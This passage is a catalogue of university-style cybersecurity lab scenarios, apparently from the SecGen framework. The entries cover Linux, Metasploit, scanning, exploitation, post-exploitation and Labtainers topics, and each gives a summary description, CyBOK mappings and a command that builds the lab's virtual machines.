In this lab, you will delve into the fascinating world of Linux and security tools, gaining practical knowledge and skills that are highly relevant in the field of cybersecurity. Linux is a powerful and versatile operating system widely used in the IT industry. Understanding Linux and its command-line interface is crucial for anyone interested in security testing and ethical hacking. You'll begin by familiarizing yourself with Linux basics, from fundamental command-line operations to concepts like piping between programs and file redirection. This lab will also introduce you to the Kali Linux distribution, a platform designed for penetration testing and ethical hacking.

Throughout this lab, you will learn how to perform various tasks, such as creating and manipulating files, exploring the Linux file system, and conducting network-related activities. You will gain hands-on experience with SSH, a secure remote shell protocol used for administration, and even attempt online brute force attacks to understand the importance of security in the digital realm. By the end of this lab, you will have honed your Linux command-line skills, developed a basic understanding of networking, and practiced using essential security tools, preparing you for more advanced challenges in the field of cybersecurity. Get ready to embark on an engaging journey where you will explore the core elements of Linux and security.

Lecture
Slides here

Reading
Chapters 1 "Introduction" and 2 "Unix History and Lineage": Garfinkel, S. and Spafford, G. and Schwartz, A. (2003), Practical Unix and Internet Security, O'Reilly. (ISBN-10: 0596003234)

Suggested:

Chapter 1 "An Overview of Computer Security": Bishop, M. (2005), Introduction to Computer Security, Addison-Wesley. (ISBN-10: 0321247442)
Lab sheet https://docs.google.com/document/d/1vA_Ev_GPqPg3cGZblgVclWmTU-sUEEBqwYpFH09mQjg/edit?usp=sharing
Type ctf-lab; lab-sheet
Author Z. Cliffe Schreuders
VM names desktop; kali

CyBOK KAs, Topics, and Keywords

KA Topic Keywords
Network Security (NS) Network Protocols and Vulnerability common network attacks
Security Operations & Incident Management (SOIM) PENETRATION TESTING PENETRATION TESTING - SOFTWARE TOOLS

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/introducing_attacks/1_intro_linux.xml run

View source

introducing_attacks/2_malware_msf_payloads.xml

Details

Key Data
Name Malware and an Introduction to Metasploit and Payloads
Description
Introduction

In this hands-on lab you will dive into the intriguing world of malware and ethical hacking, exploring how attackers create and deploy malicious software to compromise computer systems. The lab introduces you to various types of malware, such as Trojan horses, viruses, and worms, shedding light on their distinct characteristics and functionalities. You will also get acquainted with the powerful Metasploit framework, a widely-used tool in the realm of ethical hacking, and learn how to generate malicious payloads using it.

Throughout this engaging learning experience, you will undertake practical tasks, such as creating a Trojan horse that adds a new user to a Windows system, evading anti-malware detection by encoding and utilizing executable templates, and experimenting with various payloads. These hands-on exercises will equip you with essential skills in understanding, generating, and testing malware, all within a controlled and ethical learning environment. Whether you're a budding ethical hacker or simply curious about the world of cybersecurity, this lab will provide valuable insights and practical knowledge in the field of malware and penetration testing. So, gear up to explore the darker side of computing and learn how to protect against it. You'll explore, experiment, and emerge with practical expertise in a controlled environment.

Lecture
Slides here

Reading
Chapter 23 "Protecting Against Programmed Threats": Garfinkel, S. and Spafford, G. and Schwartz, A. (2003), Practical Unix and Internet Security, O'Reilly. (ISBN-10: 0596003234) Available online via the library

Suggested:

Chapter 3 "Program Security": Pfleeger, C.P. and Pfleeger, S.L. (2007), Security in Computing, Prentice Hall. (ISBN-10: 0132390779)

Chapter 19 "Malicious Logic": Bishop, M. (2005), Introduction to Computer Security, Addison-Wesley. (ISBN-10: 0321247442)
Lab sheet https://docs.google.com/document/d/1QsOLdqwBP6njIoKbeQRdattbLBLPFCB-eKHW0OxdE8U/edit?usp=sharing
Type lab-sheet
Author Z. Cliffe Schreuders
VM names windows_victim; kali

CyBOK KAs, Topics, and Keywords

KA Topic Keywords
Malware & Attack Technology (MAT) Malware Taxonomy dimensions; kinds
Malware & Attack Technology (MAT) Malware Analysis anti-analysis and evasion techniques
Malware & Attack Technology (MAT) Attacks and exploitation EXPLOITATION FRAMEWORKS
Security Operations & Incident Management (SOIM) PENETRATION TESTING PENETRATION TESTING - SOFTWARE TOOLS; PENETRATION TESTING - ACTIVE PENETRATION

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/introducing_attacks/2_malware_msf_payloads.xml run

View source

introducing_attacks/3_vulnerabilities.xml

Details

Key Data
Name Vulnerabilities, Exploits, and Remote Access Payloads
Description
Introduction
In this lab you will explore one of the major threats in computer security: software vulnerabilities. It's a critical topic in the field of cybersecurity, as understanding how attackers exploit weaknesses in software systems is essential for both defensive and offensive security measures. The lab will cover various aspects, starting with an introduction to software vulnerabilities and the causes behind them, moving on to explore different types of payloads, such as bind shells and reverse shells. You will also get hands-on experience with the Metasploit framework, a powerful tool for conducting security assessments and penetration testing.

Throughout this lab, you will gain a deeper understanding of software vulnerabilities, how exploits work, and the techniques attackers use to gain remote access to vulnerable systems. You will learn and apply both remote and local (client-side) exploits. You'll simulate creating and using a malicious PDF document to compromise a system, as well as remotely exploiting a system with known vulnerabilities. This hands-on experience will provide you with valuable insights into the world of cybersecurity and start to learn about the power of the Metasploit framework, a popular hacking and penetration testing tool.

Lecture
Slides here

Reading
Chapter 8: Using Metasploit. Harper, A. and Harris, S. and Ness, J. and Eagle, C. and Lenkey, G, and Williams, T. (2011), Gray hat hacking : the ethical hacker's handbook, McGraw-Hill. (ISBN: 978-0-07-174256-6) Available online via the library
Lab sheet https://docs.google.com/document/d/11I8xMUXrT5ArJIsAhwGDtQ4RkH4l9CR4C2wh9_wz8xM/edit?usp=sharing
Type ctf-lab; lab-sheet
Author Z. Cliffe Schreuders
VM names windows_victim; linux_victim_server; kali

CyBOK KAs, Topics, and Keywords

KA Topic Keywords
Malware & Attack Technology (MAT) Attacks and exploitation EXPLOITATION; EXPLOITATION FRAMEWORKS
Security Operations & Incident Management (SOIM) PENETRATION TESTING PENETRATION TESTING - SOFTWARE TOOLS; PENETRATION TESTING - ACTIVE PENETRATION

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/introducing_attacks/3_vulnerabilities.xml run

View source

introducing_attacks/4_dns_footprinting.xml

Details

Key Data
Name Information Gathering: Footprinting
Description
Introduction
In this lab on information gathering, you will dive into the initial stage of preparing for various cybersecurity assessments and penetration tests. Information gathering involves understanding a target and its potential vulnerabilities by collecting data that can be used for social engineering attacks, identifying network ranges and exposed systems, and discovering various services that may be potential entry points for attackers. This lab focuses on identifying hosts using DNS (Domain Name System) and provides hands-on experience with tools and techniques that ethical hackers and security professionals use to gather valuable insights about their targets.

Throughout this lab, you will learn how to use DNS-related commands and tools to determine IP addresses associated with domain names, perform reverse DNS lookups, explore DNS zone transfers to identify servers, and utilize Whois to extract domain ownership information. You will also work with automated DNS footprinting tools like dnstracer, dnsmap, dnsenum, and dnsrecon to efficiently collect valuable data. By the end of this lab, you will have a solid foundation in information gathering techniques that are essential for ethical hacking and security testing, allowing you to move on to the scanning phase of a target assessment.

Lecture
Slides here

Reading
Part I Casing the establishment. McClure, S. and Scambray, J. and Kurtz, G. (2009), Hacking exposed, McGraw-Hill. (ISBN: 978-0-07-161375-0) Available online via the library
Lab sheet https://docs.google.com/document/d/1Whs4c_mN7fFjtrYgg_uzmCGBH_EYjr7fTAgoM-OZTqQ/edit?usp=sharing
Type lab-sheet
Author Z. Cliffe Schreuders
VM names kali

CyBOK KAs, Topics, and Keywords

KA Topic Keywords
Adversarial Behaviours (AB) Models kill chains
Malware & Attack Technology (MAT) Malicious Activities by Malware cyber kill chain
Network Security (NS) PENETRATION TESTING PENETRATION TESTING - DNS ZONE TRANSFER; EXPLOITATION FRAMEWORKS
Security Operations & Incident Management (SOIM) PENETRATION TESTING PENETRATION TESTING - NETWORK MAPPING - RECONNAISSANCE; PENETRATION TESTING - SOFTWARE TOOLS

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/introducing_attacks/4_dns_footprinting.xml run

View source

introducing_attacks/5_scanning.xml

Details

Key Data
Name Information Gathering: Scanning
Description
Introduction
Information gathering and network scanning are processes aimed at understanding the structure of a network and identifying potential vulnerabilities, and ensuring the overall security of the network. Scanning a critical stage for an attacker, since it can give them the information they need in order to launch an attack. By delving into this lab, you will acquire essential knowledge and practical skills necessary for both defensive and offensive security strategies

This lab provides an in-depth exploration of scanning techniques. You will learn how to perform ping sweeps to identify live hosts on a network, create your own ping sweep bash script, and use Nmap (a popular and powerful open source tool) for host discovery. You will also explore the world of port scanning, creating your own port scanner using a bash script, and conducting SYN port scans. Additionally, you will gain insights into service identification through banner grabbing and protocol analysis, and discover methods to detect the operating system of a remote system. By the end of this lab, you will be equipped with a comprehensive understanding of network scanning techniques and will have hands-on experience in executing these scans to assess the security of target systems.

Reading
Chapter 2 Reconnaissance and Chapter 3 Scanning. Engebretson, P. (2011), The Basics of Hacking and Penetration Testing: Ethical Hacking and Penetration Testing Made Easy, Elsevier Inc. (ISBN: 978-1-59749-655-1) Available online via the library
Lab sheet https://docs.google.com/document/d/1KScKw7M4Bt_FE5F_2tI6tnK1NrKNAJkyh5F2TpOh9hA/edit?usp=sharing
Type ctf-lab; lab-sheet
Author Z. Cliffe Schreuders
VM names linux_victim_server; kali

CyBOK KAs, Topics, and Keywords

KA Topic Keywords
Adversarial Behaviours (AB) Models kill chains
Malware & Attack Technology (MAT) Malicious Activities by Malware cyber kill chain
Network Security (NS) PENETRATION TESTING PENETRATION TESTING - NETWORK MAPPING - FINGERPRINTING; PENETRATION TESTING - NETWORK MAPPING - NMAP; PENETRATION TESTING - NETWORK MAPPING - PING
Security Operations & Incident Management (SOIM) PENETRATION TESTING PENETRATION TESTING - NETWORK MAPPING - RECONNAISSANCE; PENETRATION TESTING - SOFTWARE TOOLS

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/introducing_attacks/5_scanning.xml run

View source

introducing_attacks/6_exploitation.xml

Details

Key Data
Name From Scanning to Exploitation
Description
Introduction
This lab provides hands-on experience in scanning and exploitation, allowing you to delve into the mindset of an ethical hacker. You will explore the process of moving from initial network scanning to identifying vulnerabilities, searching for exploits, and ultimately gaining control of target systems.

In this lab, you will learn how to scan a network for vulnerable servers, use Metasploit and Armitage for exploitation, and search for vulnerabilities in online databases. Specifically, you will perform tasks such as running network scans using Nmap, importing scan results into Metasploit, searching for Metasploit exploits for various platforms and services, launching exploits to gain access to target systems, and using Armitage to automate certain aspects of the hacking process. By the end of the lab, you will have gained valuable insights into the tactics and techniques used by both malicious actors and cybersecurity professionals.

Reading
Chapter 2 Reconnaissance and Chapter 3 Scanning. Engebretson, P. (2011), The Basics of Hacking and Penetration Testing: Ethical Hacking and Penetration Testing Made Easy, Elsevier Inc. (ISBN: 978-1-59749-655-1) Available online via the library
Lab sheet https://docs.google.com/document/d/1puLuKwqiFMTAZhMKKLhS_aK7kKwWnKw1e3StJBiFmFA/edit?usp=sharing
Type ctf-lab; lab-sheet
Author Z. Cliffe Schreuders
VM names windows_server; linux_server; kali

CyBOK KAs, Topics, and Keywords

KA Topic Keywords
Adversarial Behaviours (AB) Models kill chains
Malware & Attack Technology (MAT) Malicious Activities by Malware cyber kill chain
Software Security (SS) Categories of Vulnerabilities CVEs and CWEs
Malware & Attack Technology (MAT) Attacks and exploitation EXPLOITATION; EXPLOITATION FRAMEWORKS
Security Operations & Incident Management (SOIM) PENETRATION TESTING PENETRATION TESTING - SOFTWARE TOOLS; PENETRATION TESTING - ACTIVE PENETRATION

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/introducing_attacks/6_exploitation.xml run

View source

introducing_attacks/7_post-exploitation.xml

Details

Key Data
Name Post-exploitation
Description
Introduction
Post-exploitation is the phase where an attacker, having gained initial access to a target system, aims to further exploit the compromised system, gather information, escalate privileges, and maintain access. Once an attacker has a foothold in a system, they can misuse the privileges they have “appropriated” to take actions on the system, or go on to try to gain even more access on this or other connected systems. In this lab, you will delve into the intricacies of post-exploitation in a controlled environment, gaining hands-on experience in a range of activities that mirror real-world cyberattacks.

You will learn the skills used by an attacker or security tester, to take action once an exploit has been successful. Throughout this lab, you will learn how to identify and exploit vulnerabilities in a target system, understand the extent of access you have gained, and execute privilege escalation to elevate your control on the compromised system. You will compile and transfer a local privilege escalation exploit, collect password hashes, and discover sensitive data. Additionally, you will explore advanced payloads, such as Meterpreter, and experiment with features like keylogging and screen capturing. You will also understand the concept of pivoting, where you attack one system through another, and cover your tracks to maintain stealth. By the end of this comprehensive lab, you will have completed the essential stages of a typical cyberattack, enhancing your skills and knowledge in the field of cybersecurity.

Suggested reading
An excellent resource is Metasploit Unleashed.
Lab sheet https://docs.google.com/document/d/1bt0yKzKjExEih5cmXyl-D__loGwV0UJxQJEDIXxCGxw/edit?usp=sharing
Type ctf-lab; lab-sheet
Author Z. Cliffe Schreuders
VM names windows_server; linux_server; kali

CyBOK KAs, Topics, and Keywords

KA Topic Keywords
Adversarial Behaviours (AB) Models kill chains
Malware & Attack Technology (MAT) Malicious Activities by Malware cyber kill chain; attack on confidentiality; integrity; availability
Malware & Attack Technology (MAT) Attacks and exploitation Post-exploitation: pivoting attacks; information gathering
Security Operations & Incident Management (SOIM) PENETRATION TESTING PENETRATION TESTING - SOFTWARE TOOLS; PENETRATION TESTING - ACTIVE PENETRATION

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/introducing_attacks/7_post-exploitation.xml run

View source

introducing_attacks/8_vulnerability_analysis.xml

Details

Key Data
Name Vulnerability Analysis
Description
Introduction
It is important for organisations to manage the security of their systems and for security professionals to efficiently scan networks for vulnerabilities. Vulnerability assessment is a critical practice aimed at identifying and addressing weaknesses in computer systems. This process is instrumental in safeguarding networks and data from potential threats and attacks. In this lab, you will explore a range of industry-standard tools, such as Nmap, Nessus, and Nikto, to evaluate the security posture of vulnerable services. The lab provides a hands-on experience that will equip you with the skills and knowledge to detect vulnerabilities, assess their severity, and understand the importance of using different tools for comprehensive security assessments.

Throughout this lab, you will learn how to use Nmap and its Nmap scripting engine (NSE) to perform vulnerability scanning, discover potential weaknesses in a target system, and gain insights into the ethical hacking and penetration testing process. You will also explore Nessus, a commercial vulnerability scanner, and understand how it operates, what vulnerabilities it can identify, and how to interpret the results. Additionally, you will utilize Nikto, a web vulnerability scanner, to assess the security of web servers, identifying critical vulnerabilities. By completing tasks like initiating scans, analyzing results, and considering the limitations of automated tools, you will gain a practical understanding of vulnerability assessment and the role it plays in strengthening cybersecurity.

Lab sheet https://docs.google.com/document/d/1rdNcOmYOjsRu97Gh3ds8HbTpORGxbMcd2Q7U4TATIbw/edit?usp=sharing
Type ctf-lab; lab-sheet
Author Z. Cliffe Schreuders
VM names linux_server; kali

CyBOK KAs, Topics, and Keywords

KA Topic Keywords
Security Operations & Incident Management (SOIM) PENETRATION TESTING VULNERABILITY ANALYSIS / VULNERABILITY SCANNING; AUDIT APPROACH; PENETRATION TESTING - SOFTWARE TOOLS; PENETRATION TESTING - ACTIVE PENETRATION
Malware & Attack Technology (MAT) Attacks and exploitation EXPLOITATION

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/introducing_attacks/8_vulnerability_analysis.xml run

View source

labtainers/acl-hackerbot-flags.xml

Details

Key Data
Name Labtainers lab: acl
Description A Labtainers lab.
Type ctf-lab; lab-sheet
Author Z. Cliffe Schreuders
VM names desktop; hackerbot_server

CyBOK KAs, Topics, and Keywords

KA Topic Keywords
Authentication, Authorisation & Accountability (AAA) Authorisation access control; enforcing access control; ACCESS CONTROL - DAC (DISCRETIONARY ACCESS CONTROL); Vulnerabilities and attacks on access control misconfigurations
Malware & Attack Technology (MAT) MALCODE/MALWARE trojan; backdoor; TROJANS - BACKDOOR
Operating Systems & Virtualisation (OSV) Primitives for Isolation and Mediation Access controls and operating systems; Linux security model; Unix File Permissions; filesystems; inodes; and commands; umask
Operating Systems & Virtualisation (OSV) Primitives for Isolation and Mediation Access controls and operating systems; Linux security model; Linux Extended Access Control Lists (facl)
Operating Systems & Virtualisation (OSV) Role of Operating Systems mediation

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/labtainers/acl-hackerbot-flags.xml run

View source

labtainers/acl.xml

Details

Key Data
Name Labtainers lab: acl
Description A Labtainers lab.
Type ctf-lab; lab-sheet
Author Z. Cliffe Schreuders
VM names desktop

CyBOK KAs, Topics, and Keywords

KA Topic Keywords
Authentication, Authorisation & Accountability (AAA) Authorisation access control; enforcing access control; ACCESS CONTROL - DAC (DISCRETIONARY ACCESS CONTROL); Vulnerabilities and attacks on access control misconfigurations
Malware & Attack Technology (MAT) MALCODE/MALWARE trojan; backdoor; TROJANS - BACKDOOR
Operating Systems & Virtualisation (OSV) Primitives for Isolation and Mediation Access controls and operating systems; Linux security model; Unix File Permissions; filesystems; inodes; and commands; umask
Operating Systems & Virtualisation (OSV) Primitives for Isolation and Mediation Access controls and operating systems; Linux security model; Linux Extended Access Control Lists (facl)
Operating Systems & Virtualisation (OSV) Role of Operating Systems mediation

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/labtainers/acl.xml run

View source

labtainers/arp-spoof.xml

Details

Key Data
Name Labtainers lab: arp-spoof
Description A Labtainers lab.
Type ctf-lab; lab-sheet
Author Z. Cliffe Schreuders
VM names desktop

CyBOK KAs, Topics, and Keywords

KA Topic Keywords
Network Security (NS) Network Protocols and Vulnerability ADDRESS RESOLUTION PROTOCOL(ARP); ARP (ADDRESS RESOLUTION PROTOCOL); ARP SPOOFING; MITM (MAN-IN-THE-MIDDLE ATTACK); MAN-IN-THE-MIDDLE ATTACK (MITM); ATTACK(S) - ARP
Security Operations & Incident Management (SOIM) Monitor: Data Sources network traffic

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/labtainers/arp-spoof.xml run

View source

labtainers/backups.xml

Details

Key Data
Name Labtainers lab: backups
Description A Labtainers lab.
Type ctf-lab; lab-sheet
Author Z. Cliffe Schreuders
VM names desktop

CyBOK KAs, Topics, and Keywords

KA Topic Keywords
Security Operations & Incident Management (SOIM) Execute: Mitigation and Countermeasures Recover data and services after an incident; BACKUP - DIFFERENTIAL; BACKUP - INFERENTIAL
Security Operations & Incident Management (SOIM) INCIDENT RESPONSE RECOVERY - BACKUPS; RECOVERY; BACKUPS

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/labtainers/backups.xml run

View source

labtainers/backups2.xml

Details

Key Data
Name Labtainers lab: backups2
Description A Labtainers lab.
Type ctf-lab; lab-sheet
Author Z. Cliffe Schreuders
VM names desktop

CyBOK KAs, Topics, and Keywords

KA Topic Keywords
Security Operations & Incident Management (SOIM) Execute: Mitigation and Countermeasures Recover data and services after an incident; BACKUP - DIFFERENTIAL; BACKUP - INFERENTIAL
Security Operations & Incident Management (SOIM) INCIDENT RESPONSE RECOVERY - BACKUPS; RECOVERY; BACKUPS

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/labtainers/backups2.xml run

View source

labtainers/bufoverflow.xml

Details

Key Data
Name Labtainers lab: bufoverflow
Description A Labtainers lab.
Type ctf-lab; lab-sheet
Author Z. Cliffe Schreuders
VM names desktop

CyBOK KAs, Topics, and Keywords

KA Topic Keywords
Software Security (SS) Categories of Vulnerabilities memory management vulnerabilities; Stack smashing buffer overflows
Malware & Attack Technology (MAT) Attacks and exploitation EXPLOITATION; EXPLOITATION FRAMEWORKS; Exploit development; Metasploit Framework development
Software Security (SS) Mitigating Exploitation ASLR (ADDRESS SPACE LAYOUT RANDOMIZATION); NON-EXECUTABLE MEMORY

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/labtainers/bufoverflow.xml run

View source

labtainers/capabilities.xml

Details

Key Data
Name Labtainers lab: capabilities
Description A Labtainers lab.
Type ctf-lab; lab-sheet
Author Z. Cliffe Schreuders
VM names desktop

CyBOK KAs, Topics, and Keywords

KA Topic Keywords
Operating Systems & Virtualisation (OSV) Primitives for Isolation and Mediation capabilities; Rule-based controls: Course grained: Linux capabilities
Security Operations & Incident Management (SOIM) Monitor: Data Sources network traffic

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/labtainers/capabilities.xml run

View source

labtainers/centos-log.xml

Details

Key Data
Name Labtainers lab: centos-log
Description A Labtainers lab.
Type ctf-lab; lab-sheet
Author Z. Cliffe Schreuders
VM names desktop

CyBOK KAs, Topics, and Keywords

KA Topic Keywords
Security Operations & Incident Management (SOIM) Monitor: Data Sources application logs: web server logs and files; system and kernel logs; Syslog

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/labtainers/centos-log.xml run

View source

labtainers/centos-log2.xml

Details

Key Data
Name Labtainers lab: centos-log2
Description A Labtainers lab.
Type ctf-lab; lab-sheet
Author Z. Cliffe Schreuders
VM names desktop

CyBOK KAs, Topics, and Keywords

KA Topic Keywords
Security Operations & Incident Management (SOIM) Monitor: Data Sources application logs: web server logs and files; system and kernel logs; Syslog

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/labtainers/centos-log2.xml run

View source

labtainers/denyhost.xml

Details

Key Data
Name Labtainers lab: denyhost
Description A Labtainers lab.
Type ctf-lab; lab-sheet
Author Z. Cliffe Schreuders
VM names desktop

CyBOK KAs, Topics, and Keywords

KA Topic Keywords
Network Security (NS) Network Defence Tools packet filters; intrusion detection systems; intrusion prevention systems
Security Operations & Incident Management (SOIM) Execute: Mitigation and Countermeasures intrusion prevention systems
Security Operations & Incident Management (SOIM) CM (CONFIGURATION MANAGEMENT) SSH (SECURE SHELL)

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/labtainers/denyhost.xml run

View source

labtainers/dmz-example.xml

Details

Key Data
Name Labtainers lab: dmz-example
Description A Labtainers lab.
Type ctf-lab; lab-sheet
Author Z. Cliffe Schreuders
VM names desktop

CyBOK KAs, Topics, and Keywords

KA Topic Keywords
Network Security (NS) Network Defence Tools DEMILITARISED ZONE (DMZ)

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/labtainers/dmz-example.xml run

View source

labtainers/dmz-lab.xml

Details

Key Data
Name Labtainers lab: dmz-lab
Description A Labtainers lab.
Type ctf-lab; lab-sheet
Author Z. Cliffe Schreuders
VM names desktop

CyBOK KAs, Topics, and Keywords

KA Topic Keywords
Network Security (NS) Network Defence Tools DEMILITARISED ZONE (DMZ)

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/labtainers/dmz-lab.xml run

View source

labtainers/file-deletion.xml

Details

Key Data
Name Labtainers lab: file-deletion
Description A Labtainers lab.
Type ctf-lab; lab-sheet
Author Z. Cliffe Schreuders
VM names desktop

CyBOK KAs, Topics, and Keywords

KA Topic Keywords
Forensics (F) Operating System Analysis storage forensics; data recovery and file content carving

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/labtainers/file-deletion.xml run

View source

labtainers/file-integrity.xml

Details

Key Data
Name Labtainers lab: file-integrity
Description A Labtainers lab.
Type ctf-lab; lab-sheet
Author Z. Cliffe Schreuders
VM names desktop

CyBOK KAs, Topics, and Keywords

KA Topic Keywords
Authentication, Authorisation & Accountability (AAA) Authentication access control; Protecting integrity
Forensics (F) Operating System Analysis cryptographic hashing; storage forensics; data recovery and file content carving
Security Operations & Incident Management (SOIM) Monitor: Data Sources MONITORING - FILE INTEGRITY CHECKERS

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/labtainers/file-integrity.xml run

View source

labtainers/formatstring.xml

Details

Key Data
Name Labtainers lab: formatstring
Description A Labtainers lab.
Type ctf-lab; lab-sheet
Author Z. Cliffe Schreuders
VM names desktop

CyBOK KAs, Topics, and Keywords

KA Topic Keywords
Malware & Attack Technology (MAT) Attacks and exploitation EXPLOITATION; Exploit development; Mitigation bypass: ASLR
Software Security (SS) Categories of Vulnerabilities memory management vulnerabilities; Format string attacks

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/labtainers/formatstring.xml run

View source

labtainers/gdblesson.xml

Details

Key Data
Name Labtainers lab: gdblesson
Description A Labtainers lab.
Type ctf-lab; lab-sheet
Author Z. Cliffe Schreuders
VM names desktop

CyBOK KAs, Topics, and Keywords

KA Topic Keywords
Malware & Attack Technology (MAT) Malware Analysis analysis techniques; analysis environments; STATIC ANALYSIS

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/labtainers/gdblesson.xml run

View source

labtainers/grassmarlin.xml

Details

Key Data
Name Labtainers lab: grassmarlin
Description A Labtainers lab.
Type ctf-lab; lab-sheet
Author Z. Cliffe Schreuders
VM names desktop

CyBOK KAs, Topics, and Keywords

KA Topic Keywords
Cyber-Physical Systems Security (CPS) Cyber-Physical Systems characteristics; security and privacy concerns
Cyber-Physical Systems Security (CPS) Cyber-Physical Systems Domains industrial control systems; SUPERVISORY CONTROL AND DATA ACQUISITION (SCADA)
Security Operations & Incident Management (SOIM) Monitor: Data Sources network traffic

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/labtainers/grassmarlin.xml run

View source

labtainers/grfics.xml

Details

Key Data
Name Labtainers lab: grfics
Description A Labtainers lab.
Type ctf-lab; lab-sheet
Author Z. Cliffe Schreuders
VM names desktop

CyBOK KAs, Topics, and Keywords

KA Topic Keywords
Adversarial Behaviours (AB) Models kill chains
Cyber-Physical Systems Security (CPS) Cyber-Physical Systems characteristics; protection against natural events and accidents; security and privacy concerns
Cyber-Physical Systems Security (CPS) Cyber-Physical Systems Domains industrial control systems
Network Security (NS) Network Defence Tools intrusion detection systems; network architecture design

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/labtainers/grfics.xml run

View source

labtainers/ida.xml

Details

Key Data
Name Labtainers lab: ida
Description A Labtainers lab.
Type ctf-lab; lab-sheet
Author Z. Cliffe Schreuders
VM names desktop

CyBOK KAs, Topics, and Keywords

KA Topic Keywords
Malware & Attack Technology (MAT) Malware Analysis analysis techniques; analysis environments; STATIC ANALYSIS

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/labtainers/ida.xml run

View source

labtainers/iptables-ics.xml

Details

Key Data
Name Labtainers lab: iptables-ics
Description A Labtainers lab.
Type ctf-lab; lab-sheet
Author Z. Cliffe Schreuders
VM names desktop

CyBOK KAs, Topics, and Keywords

KA Topic Keywords
Cyber-Physical Systems Security (CPS) Cyber-Physical Systems Domains industrial control systems
Cyber-Physical Systems Security (CPS) Cyber-Physical Systems security and privacy concerns
Network Security (NS) Network Defence Tools FIREWALLS; IPTables
Network Security (NS) Internet Architecture network layer security
Web & Mobile Security (WAM) FIREWALLS FIREWALLS

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/labtainers/iptables-ics.xml run

View source

labtainers/iptables.xml

Details

Key Data
Name Labtainers lab: iptables
Description A Labtainers lab.
Type ctf-lab; lab-sheet
Author Z. Cliffe Schreuders
VM names desktop

CyBOK KAs, Topics, and Keywords

KA Topic Keywords
Network Security (NS) Network Defence Tools FIREWALLS; IPTables
Network Security (NS) Internet Architecture network layer security
Web & Mobile Security (WAM) FIREWALLS FIREWALLS

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/labtainers/iptables.xml run

View source

labtainers/iptables2.xml

Details

Key Data
Name Labtainers lab: iptables2
Description A Labtainers lab.
Type ctf-lab; lab-sheet
Author Z. Cliffe Schreuders
VM names desktop

CyBOK KAs, Topics, and Keywords

KA Topic Keywords
Network Security (NS) Network Defence Tools FIREWALLS; IPTables
Network Security (NS) Internet Architecture network layer security
Web & Mobile Security (WAM) FIREWALLS FIREWALLS

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/labtainers/iptables2.xml run

View source

labtainers/ldap.xml

Details

Key Data
Name Labtainers lab: ldap
Description A Labtainers lab.
Type ctf-lab; lab-sheet
Author Z. Cliffe Schreuders
VM names desktop

CyBOK KAs, Topics, and Keywords

KA Topic Keywords
Authentication, Authorisation & Accountability (AAA) Authentication identity management; user authentication; facets of authentication; authentication in distributed systems
Authentication, Authorisation & Accountability (AAA) Authorisation AUTHORIZATION - LDAP (LIGHTWEIGHT DIRECTORY ACCESS PROTOCOL)
Security Operations & Incident Management (SOIM) Monitor: Data Sources network traffic

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/labtainers/ldap.xml run

View source

labtainers/local-dns.xml

Details

Key Data
Name Labtainers lab: local-dns
Description A Labtainers lab.
Type ctf-lab; lab-sheet
Author Z. Cliffe Schreuders
VM names desktop

CyBOK KAs, Topics, and Keywords

KA Topic Keywords
Network Security (NS) Network Protocols and Vulnerability ADDRESS RESOLUTION PROTOCOL(ARP); ARP (ADDRESS RESOLUTION PROTOCOL); ARP SPOOFING; DNS ATTACKS

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/labtainers/local-dns.xml run

View source

labtainers/macs-hash.xml

Details

Key Data
Name Labtainers lab: macs-hash
Description A Labtainers lab.
Type ctf-lab; lab-sheet
Author Z. Cliffe Schreuders
VM names desktop

CyBOK KAs, Topics, and Keywords

KA Topic Keywords
Authentication, Authorisation & Accountability (AAA) Authentication user authentication; Cryptography and authentication (hashes and attacks against authentication schemes / passwords)
Applied Cryptography (AC) Public-Key Cryptography symmetric encryption and authentication; MESSAGE AUTHENTICATION CODE (MAC); HASHED MESSAGE AUTHENTICATION CODE (HMAC)
Forensics (F) Artifact Analysis cryptographic hashing

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/labtainers/macs-hash.xml run

View source

labtainers/metasploit.xml

Details

Key Data
Name Labtainers lab: metasploit
Description A Labtainers lab.
Type ctf-lab; lab-sheet
Author Z. Cliffe Schreuders
VM names desktop

CyBOK KAs, Topics, and Keywords

KA Topic Keywords
Malware & Attack Technology (MAT) Malicious Activities by Malware cyber kill chain
Malware & Attack Technology (MAT) Attacks and exploitation EXPLOITATION; EXPLOITATION FRAMEWORKS
Security Operations & Incident Management (SOIM) PENETRATION TESTING PENETRATION TESTING - SOFTWARE TOOLS; PENETRATION TESTING - ACTIVE PENETRATION

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/labtainers/metasploit.xml run

View source

labtainers/nix-commands.xml

Details

Key Data
Name Labtainers lab: nix-commands
Description A Labtainers lab.
Type ctf-lab; lab-sheet
